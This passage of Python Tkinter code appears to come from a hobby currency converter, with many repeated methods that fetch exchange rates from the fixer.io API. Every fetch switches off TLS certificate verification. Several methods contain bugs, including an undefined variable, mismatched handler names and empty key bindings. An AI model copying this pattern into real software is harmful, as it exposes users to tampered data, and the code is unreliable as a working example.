parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val5= float(user_value5.get()) * (usd_rate)\n int(val5)\n\n x5 = Label(root, text=\"USD: \")\n x5.place(x=250, y=265)\n out5 = Label(root)\n out5.config(text = '{:0.2f}'.format(val5))\n out5.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_INR(self):\n global user_value9\n user_ask9 = Label(root, text =\"How many Euros? \")\n user_ask9.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value9 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value9.place(x=370, y=225)\n\n calcButton9 = Button(self, text=\" Convert \", command=self.cal9)\n calcButton9.place(x=265, y=450)\n root.bind(\"\", self.linkCal9)\n def linkCal9(self, event=None):\n self.cal9()\n def cal9(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val9= float(user_value9.get()) * (inr_rate)\n int(val9)\n\n x9 = Label(root, text=\"INR: \")\n x9.place(x=250, y=265)\n out9 = Label(root)\n out9.config(text = '{:0.2f}'.format(val9))\n out9.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_JPY(self):\n global user_value14\n user_ask14 = Label(root, text =\"How many Euros? \")\n user_ask14.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value14 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value14.place(x=370, y=225)\n\n calcButton14 = Button(self, text=\" Convert \", command=self.cal14)\n calcButton14.place(x=265, y=450)\n root.bind(\"\", self.linkCal14)\n def linkCal14(self, event=None):\n self.cal14()\n def cal14(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val14= float(user_value14.get()) * (jpy_rate)\n int(val14)\n\n x14 = Label(root, text=\"JPY: \")\n x14.place(x=250, y=265)\n out14 = Label(root)\n out14.config(text = '{:0.2f}'.format(val14))\n out14.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_BRL(self):\n global user_value21\n user_ask21 = Label(root, text =\"How many Euros? \")\n user_ask21.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value21 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value21.place(x=370, y=225)\n\n calcButton21 = Button(self, text=\" Convert \", command=self.cal21)\n calcButton21.place(x=265, y=450)\n root.bind(\"\", self.linkCal21)\n def linkCal21(self, event=None):\n self.cal21()\n def cal21(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val21= float(user_value21.get()) * (brl_rate)\n int(val21)\n\n x21 = Label(root, text=\"BRL: \")\n x21.place(x=250, y=265)\n out21 = Label(root)\n out21.config(text = '{:0.2f}'.format(val21))\n out21.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_GBP(self):\n global user_value31\n user_ask31 = Label(root, text =\"How many Euros? \")\n user_ask31.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value31 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value31.place(x=370, y=225)\n\n calcButton31 = Button(self, text=\" Convert \", command=self.cal31)\n calcButton31.place(x=265, y=450)\n root.bind(\"\", self.linkCal31)\n def linkCal131(self, event=None):\n self.cal31()\n def cal31(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val31= float(user_value31.get()) * (gbp_rate)\n int(val31)\n\n x31 = Label(root, text=\"GBP: \")\n x31.place(x=250, y=265)\n out31 = Label(root)\n out31.config(text = '{:0.2f}'.format(val31))\n out31.place(x=380, y=265)\n\n self.again()\n \n \n def INR_to_CAD(self):\n global user_value7\n user_ask7 = Label(root, text =\"How many Indian Rs? \")\n user_ask7.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value7 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value7.place(x=370, y=225)\n\n calcButton7 = Button(self, text=\" Convert \", command=self.cal7)\n calcButton7.place(x=265, y=450)\n root.bind(\"\", self.linkCal7)\n def linkCal7(self, event=None):\n self.cal7()\n def cal7(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val7= float(user_value7.get()) * (cad_rate)\n int(val7)\n\n x7 = Label(root, text=\"CAD: \")\n x7.place(x=250, y=265)\n out7 = Label(root)\n out7.config(text = '{:0.2f}'.format(val7))\n out7.place(x=380, y=265)\n\n self.again()\n\n def INR_to_USD(self):\n global user_value10\n user_ask10 = Label(root, text =\"How many Indian Rs? \")\n user_ask10.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value10 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value10.place(x=370, y=225)\n\n calcButton10 = Button(self, text=\" Convert \", command=self.cal10)\n calcButton10.place(x=265, y=450)\n root.bind(\"\", self.linkCal10)\n def linkCal10(self, event=None):\n self.cal10()\n def cal10(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val10= float(user_value10.get()) * (usd_rate)\n int(val10)\n\n x10 = Label(root, text=\"USD: \")\n x10.place(x=250, y=265)\n out10 = Label(root)\n out10.config(text = '{:0.2f}'.format(val10))\n out10.place(x=380, y=265)\n\n self.again()\n\n def INR_to_EUR(self):\n global user_value11\n user_ask11 = Label(root, text =\"How many Indian Rs? \")\n user_ask11.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value11 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value11.place(x=370, y=225)\n\n calcButton11 = Button(self, text=\" Convert \", command=self.cal11)\n calcButton11.place(x=265, y=450)\n root.bind(\"\", self.linkCal11)\n def linkCal11(self, event=None):\n self.cal11()\n def cal11(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val11= float(user_value11.get()) * (eur_rate)\n int(val11)\n\n x11 = Label(root, text=\"EUR: \")\n x11.place(x=250, y=265)\n out11 = Label(root)\n out11.config(text = '{:0.2f}'.format(val11))\n out11.place(x=380, y=265)\n\n self.again()\n\n def INR_to_JPY(self):\n global user_value15\n user_ask15 = Label(root, text =\"How many Indian Rs? \")\n user_ask15.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value15 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value15.place(x=370, y=225)\n\n calcButton15 = Button(self, text=\" Convert \", command=self.cal15)\n calcButton15.place(x=265, y=450)\n root.bind(\"\", self.linkCal15)\n def linkCal15(self, event=None):\n self.cal15()\n def cal15(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val15= float(user_value15.get()) * (jpy_rate)\n int(val15)\n\n x15 = Label(root, text=\"JPY: \")\n x15.place(x=250, y=265)\n out15 = Label(root)\n out15.config(text = '{:0.2f}'.format(val15))\n out15.place(x=380, y=265)\n\n self.again()\n\n def INR_to_BRL(self):\n global user_value22\n user_ask2 = Label(root, text =\"How many Indian Rs? \")\n user_ask22.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value22 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value22.place(x=370, y=225)\n\n calcButton22 = Button(self, text=\" Convert \", command=self.cal22)\n calcButton22.place(x=265, y=450)\n root.bind(\"\", self.linkCal22)\n def linkCal22(self, event=None):\n self.cal22()\n def cal22(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val22= float(user_value22.get()) * (brl_rate)\n int(val22)\n\n x22 = Label(root, text=\"BRL: \")\n x22.place(x=250, y=265)\n out22 = Label(root)\n out22.config(text = '{:0.2f}'.format(val22))\n out22.place(x=380, y=265)\n\n self.again()\n\n def INR_to_GBP(self):\n global user_value32\n user_ask32 = Label(root, text =\"How many Indian Rs? \")\n user_ask32.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value32 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value32.place(x=370, y=225)\n\n calcButton32 = Button(self, text=\" Convert \", command=self.cal32)\n calcButton32.place(x=265, y=450)\n root.bind(\"\", self.linkCal32)\n def linkCal32(self, event=None):\n self.cal32()\n def cal32(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val32= float(user_value32.get()) * (gbp_rate)\n int(val32)\n\n x32 = Label(root, text=\"GBP: \")\n x32.place(x=250, y=265)\n out32 = Label(root)\n out32.config(text = '{:0.2f}'.format(val32))\n out32.place(x=380, y=265)\n\n self.again()\n \n\n def JPY_to_CAD(self):\n global user_value16\n user_ask16 = Label(root, text =\"How many Japanese Yen? \")\n user_ask16.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value16 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value16.place(x=370, y=225)\n\n calcButton16 = Button(self, text=\" Convert \", command=self.cal16)\n calcButton16.place(x=265, y=450)\n root.bind(\"\", self.linkCal16)\n def linkCal16(self, event=None):\n self.cal16()\n def cal16(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val16= float(user_value16.get()) * (cad_rate)\n int(val16)\n\n x16 = Label(root, text=\"CAD: \")\n x16.place(x=250, y=265)\n out16 = Label(root)\n out16.config(text = '{:0.2f}'.format(val16))\n out16.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_USD(self):\n global user_value17\n user_ask17 = Label(root, text =\"How many Japanese Yen? \")\n user_ask17.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value17 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value17.place(x=370, y=225)\n\n calcButton17 = Button(self, text=\" Convert \", command=self.cal17)\n calcButton17.place(x=265, y=450)\n root.bind(\"\", self.linkCal17)\n def linkCal17(self, event=None):\n self.cal17()\n def cal17(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val17= float(user_value17.get()) * (usd_rate)\n int(val17)\n\n x17 = Label(root, text=\"USD: \")\n x17.place(x=250, y=265)\n out17 = Label(root)\n out17.config(text = '{:0.2f}'.format(val17))\n out17.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_EUR(self):\n global user_value18\n user_ask18 = Label(root, text =\"How many Japanese Yen? \")\n user_ask18.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value18 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value18.place(x=370, y=225)\n\n calcButton18 = Button(self, text=\" Convert \", command=self.cal18)\n calcButton18.place(x=265, y=450)\n root.bind(\"\", self.linkCal18)\n def linkCal18(self, event=None):\n self.cal18()\n def cal18(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val18= float(user_value18.get()) * (eur_rate)\n int(val18)\n\n x18 = Label(root, text=\"EUR: \")\n x18.place(x=250, y=265)\n out18 = Label(root)\n out18.config(text = '{:0.2f}'.format(val18))\n out18.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_INR(self):\n global user_value19\n user_ask19 = Label(root, text =\"How many Japanese Yen? \")\n user_ask19.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value19 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value19.place(x=370, y=225)\n\n calcButton19 = Button(self, text=\" Convert \", command=self.cal19)\n calcButton19.place(x=265, y=450)\n root.bind(\"\", self.linkCal19)\n def linkCal19(self, event=None):\n self.cal19()\n def cal19(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val19= float(user_value19.get()) * (inr_rate)\n int(val19)\n\n x19 = Label(root, text=\"INR: \")\n x19.place(x=250, y=265)\n out19 = Label(root)\n out19.config(text = '{:0.2f}'.format(val19))\n out19.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_BRL(self):\n global user_value23\n user_ask23 = Label(root, text =\"How many Japanese Yen? \")\n user_ask23.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value23 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value23.place(x=370, y=225)\n\n calcButton23 = Button(self, text=\" Convert \", command=self.cal23)\n calcButton23.place(x=265, y=450)\n root.bind(\"\", self.linkCal23)\n def linkCal23(self, event=None):\n self.cal23()\n def cal23(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val23= float(user_value23.get()) * (brl_rate)\n int(val23)\n\n x23 = Label(root, text=\"BRL: \")\n x23.place(x=250, y=265)\n out23 = Label(root)\n out23.config(text = '{:0.2f}'.format(val23))\n out23.place(x=380, y=265)\n\n self.again()\n\n def JPY_to_GBP(self):\n global user_value33\n user_ask33 = Label(root, text =\"How many Japanese Yen? \")\n user_ask33.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value33 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value33.place(x=370, y=225)\n\n calcButton33 = Button(self, text=\" Convert \", command=self.cal33)\n calcButton33.place(x=265, y=450)\n root.bind(\"\", self.linkCal33)\n def linkCal33(self, event=None):\n self.cal33()\n def cal33(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val33= float(user_value33.get()) * (gbp_rate)\n int(val33)\n\n x33 = Label(root, text=\"GBP: \")\n x33.place(x=250, y=265)\n out33 = Label(root)\n out33.config(text = '{:0.2f}'.format(val33))\n out33.place(x=380, y=265)\n\n self.again()\n \n\n def BRL_to_CAD(self):\n global user_value24\n user_ask24 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask24.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value24 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value24.place(x=370, y=225)\n\n calcButton24 = Button(self, text=\" Convert \", command=self.cal24)\n calcButton24.place(x=265, y=450)\n root.bind(\"\", self.linkCal24)\n def linkCal24(self, event=None):\n self.cal24()\n def cal24(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val24= float(user_value24.get()) * (cad_rate)\n int(val24)\n\n x24 = Label(root, text=\"CAD: \")\n x24.place(x=250, y=265)\n out24 = Label(root)\n out24.config(text = '{:0.2f}'.format(val24))\n out24.place(x=380, y=265)\n\n self.again()\n\n def BRL_to_USD(self):\n global user_value25\n user_ask25 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask25.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value25 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value25.place(x=370, y=225)\n\n calcButton25 = Button(self, text=\" Convert \", command=self.cal25)\n calcButton25.place(x=265, y=450)\n root.bind(\"\", self.linkCal24)\n def linkCal25(self, event=None):\n self.cal25()\n def cal25(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val25= float(user_value25.get()) * (usd_rate)\n int(val25)\n\n x25 = Label(root, text=\"USD: \")\n x25.place(x=250, y=265)\n out25 = Label(root)\n out25.config(text = '{:0.2f}'.format(val25))\n out25.place(x=380, y=265)\n\n self.again()\n\n def BRL_to_EUR(self):\n global user_value26\n user_ask26 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask26.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value26 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value26.place(x=370, y=225)\n\n calcButton26 = Button(self, text=\" Convert \", command=self.cal26)\n calcButton26.place(x=265, y=450)\n root.bind(\"\", self.linkCal26)\n def linkCal26(self, event=None):\n self.cal26()\n def cal26(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val26= float(user_value26.get()) * (eur_rate)\n int(val26)\n\n x26 = Label(root, text=\"EUR: \")\n x26.place(x=250, y=265)\n out26 = Label(root)\n out26.config(text = '{:0.2f}'.format(val26))\n out26.place(x=380, y=265)\n\n self.again()\n\n def BRL_to_INR(self):\n global user_value27\n user_ask27 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask27.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value27 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value27.place(x=370, y=225)\n\n calcButton27 = Button(self, text=\" Convert \", command=self.cal27)\n calcButton27.place(x=265, y=450)\n root.bind(\"\", self.linkCal27)\n def linkCal27(self, event=None):\n self.cal27()\n def cal27(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val27= float(user_value27.get()) * (inr_rate)\n int(val27)\n\n x27 = Label(root, text=\"INR: \")\n x27.place(x=250, y=265)\n out27 = Label(root)\n out27.config(text = '{:0.2f}'.format(val27))\n out27.place(x=380, y=265)\n self.again()\n\n def BRL_to_JPY(self):\n global user_value28\n user_ask28 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask28.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value28 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value28.place(x=370, y=225)\n\n calcButton28 = Button(self, text=\" Convert \", command=self.cal28)\n calcButton28.place(x=265, y=450)\n root.bind(\"\", self.linkCal28)\n def linkCal28(self, event=None):\n self.cal28()\n def cal28(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val28= float(user_value28.get()) * (jpy_rate)\n int(val28)\n\n x28 = Label(root, text=\"JPY: \")\n x28.place(x=250, y=265)\n out28 = Label(root)\n out28.config(text = '{:0.2f}'.format(val28))\n out28.place(x=380, y=265)\n self.again()\n\n def BRL_to_GBP(self):\n global user_value34\n user_ask34 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask34.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value34 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value34.place(x=370, y=225)\n\n calcButton34 = Button(self, text=\" Convert \", command=self.cal34)\n calcButton34.place(x=265, y=450)\n root.bind(\"\", self.linkCal34)\n def linkCal34(self, event=None):\n self.cal34()\n def cal34(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val34= float(user_value34.get()) * (gbp_rate)\n int(val34)\n\n x34 = Label(root, text=\"GBP: \")\n x34.place(x=250, y=265)\n out34 = Label(root)\n out34.config(text = '{:0.2f}'.format(val34))\n out34.place(x=380, y=265)\n\n self.again()\n\n\n def GBP_to_CAD(self):\n global user_value35\n user_ask35 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask35.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value35 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value35.place(x=370, y=225)\n\n calcButton35 = Button(self, text=\" Convert \", command=self.cal35)\n calcButton35.place(x=265, y=450)\n root.bind(\"\", self.linkCal35)\n def linkCal35(self, event=None):\n self.cal35()\n def cal35(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val35= float(user_value35.get()) * (cad_rate)\n int(val35)\n\n x35 = Label(root, text=\"CAD: \")\n x35.place(x=250, y=265)\n out35 = Label(root)\n out35.config(text = '{:0.2f}'.format(val35))\n out35.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_USD(self):\n global user_value36\n user_ask36 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask36.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value36 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value36.place(x=370, y=225)\n\n calcButton36 = Button(self, text=\" Convert \", command=self.cal36)\n calcButton36.place(x=265, y=450)\n root.bind(\"\", self.linkCal36)\n def linkCal36(self, event=None):\n self.cal36()\n def cal36(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val36= float(user_value36.get()) * (usd_rate)\n int(val36)\n\n x36 = Label(root, text=\"USD: \")\n x36.place(x=250, y=265)\n out36 = Label(root)\n out36.config(text = '{:0.2f}'.format(val36))\n out36.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_EUR(self):\n global user_value37\n user_ask37 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask37.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value37 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value37.place(x=370, y=225)\n\n calcButton37 = Button(self, text=\" Convert \", command=self.cal37)\n calcButton37.place(x=265, y=450)\n root.bind(\"\", self.linkCal37)\n def linkCal37(self, event=None):\n self.cal37()\n def cal37(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val37= float(user_value37.get()) * (eur_rate)\n int(val37)\n\n x37 = Label(root, text=\"EUR: \")\n x37.place(x=250, y=265)\n out37 = Label(root)\n out37.config(text = '{:0.2f}'.format(val37))\n out37.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_INR(self):\n global user_value38\n user_ask38 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask38.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value38 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value38.place(x=370, y=225)\n\n calcButton38 = Button(self, text=\" Convert \", command=self.cal38)\n calcButton38.place(x=265, y=450)\n root.bind(\"\", self.linkCal38)\n def linkCal38(self, event=None):\n self.cal38()\n def cal38(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val38= float(user_value38.get()) * (inr_rate)\n int(val38)\n\n x38 = Label(root, text=\"INR: \")\n x38.place(x=250, y=265)\n out38 = Label(root)\n out38.config(text = '{:0.2f}'.format(val38))\n out38.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_JPY(self):\n global user_value39\n user_ask39 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask39.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value39 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value39.place(x=370, y=225)\n\n calcButton39 = Button(self, text=\" Convert \", command=self.cal39)\n calcButton39.place(x=265, y=450)\n root.bind(\"\", self.linkCal39)\n def linkCal39(self, event=None):\n self.cal39()\n def cal39(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val39= float(user_value39.get()) * (jpy_rate)\n int(val39)\n\n x39 = Label(root, text=\"JPY: 